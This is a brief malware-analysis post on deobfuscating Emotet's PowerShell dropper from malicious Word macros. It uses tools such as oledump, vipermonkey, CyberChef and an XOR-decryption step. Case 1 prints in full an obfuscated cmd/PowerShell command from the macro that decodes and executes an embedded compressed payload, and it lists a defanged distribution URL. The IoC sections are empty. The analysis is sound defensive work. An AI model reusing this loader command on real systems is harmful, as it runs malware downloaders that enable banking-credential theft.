Deobfuscating Emotet’s powershell payload

Emotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Emotet is a polymorphic Trojan that can evade typical signature-based detection. It has several methods for maintaining persistence, including auto-start registry keys and services.

Case 1:

I start my analysis by download this Document “Untitled-84617482333317.doc” hosted in hxxp://ecsconsultancy.com.au/En_us/Transactions/2018-11/ (md5:0f72b971327d2b5902d21704a94138eb).

The Word document files spread via botnet contains a malicious macro as shown.The next step is to deobfuscate this macro.So,i try to dump out the stream from the Untitled-84617482333317.doc” with “oledump”

CMD C:\wINdows\systEM32\cMd /c “SEt KQI= (nEW-oBJecT SySTem.Io.StReaMReaDEr( ( nEW-oBJecT io.cOMPReSsion.DeFLAtEStReAm([iO.MEmORYstrEAm] [SyStEm.CONVeRT]::fROMBASe64STRing( ‘PZBba8JAEIX/Sh4W1mDdVLBaXAK2FS8t2IpILfQlyY5mc9lJ48TYhvz3JlL7Ouc7H5xh0WbqGih76EcQkLUCEu/gPyUaDEk22ymXh0TZ2HF8jQRHEgEKrZyzWr3Ny9G6P/mL4yKNU98zqjCHhkmdWbZ4SdV+dwUIgtBgiahaRQzOcA63D/Hzqb++IgbwkGORCY3OcAuLox++/td1dswx9Iy+2DH5+hgNBlxsskRTh0+4Ldl2rS3X4vd3Ay4ZPZYuA3MaE6RZl3/ybpt3uYAzcLnHHLwg7LDoZ2VpY7VT7Yry74o1LxFTLE2CnprpBC7MjdUKbbk0J4yht2ykl4v0G08s68CjIKzq+hc=’ ), [syStEM.iO.ComPReSsION.cOMPRESsIonMODe]::DeCoMPreSs) ) ,[TeXt.enCOdINg]::AsCII) ).REAdtOEnD( ) ^|^&( ([strIng]$verBOsEpreFeRence)[1,3]+’X’-JoiN’’)&& PoWErshELL ^& ( \”{0}{1}\” -f’SET-ItE’,’m’ ) (‘Va’ +’RI’+ ‘AbLE:jW1V’) ( [tYpE](\”{1}{0}{2}\” -f’nVi’,’E’,’rONMENT’) ) ; ^&( ${En`V:`comS`PeC}[4,24,25]-join’’ )( ( ( . ( \”{1}{0}{2}{3}\” -f’-ch’,’gEt’,’IlDiT’,’EM’ ) ( ‘vA’ + ‘rI’+’aBle:jW1v’ ) ).VALue::( \”{3}{0}{1}{4}{6}{5}{2}\” -f ‘Vir’,’On’,’BlE’,’gEten’,’Me’,’vaRIa’,’NT’ ).Invoke( ‘kqi’,( \”{0}{2}{1}\” -f ‘pro’,’sS’,’CE’ ) ) ) )”

To deobfuscate the macro,i use this script https://raw.githubusercontent.com/lasq88/deobfuscate/master/deobfuscate.py or we can use this script

Another alternative we can use to extract IoC by using CyberChef .

IoC found :

Case 2:

Using the oledump.py tool ,we can see that the document contain macro code.

The next step is to extract the macro

So using the “vipermonkey” we can extract the whole Powershell

The Powershell does seem encrypted.the encryption is simple xor with key of 0x3a.

we can use the python script to decrypt de powershell

IoC: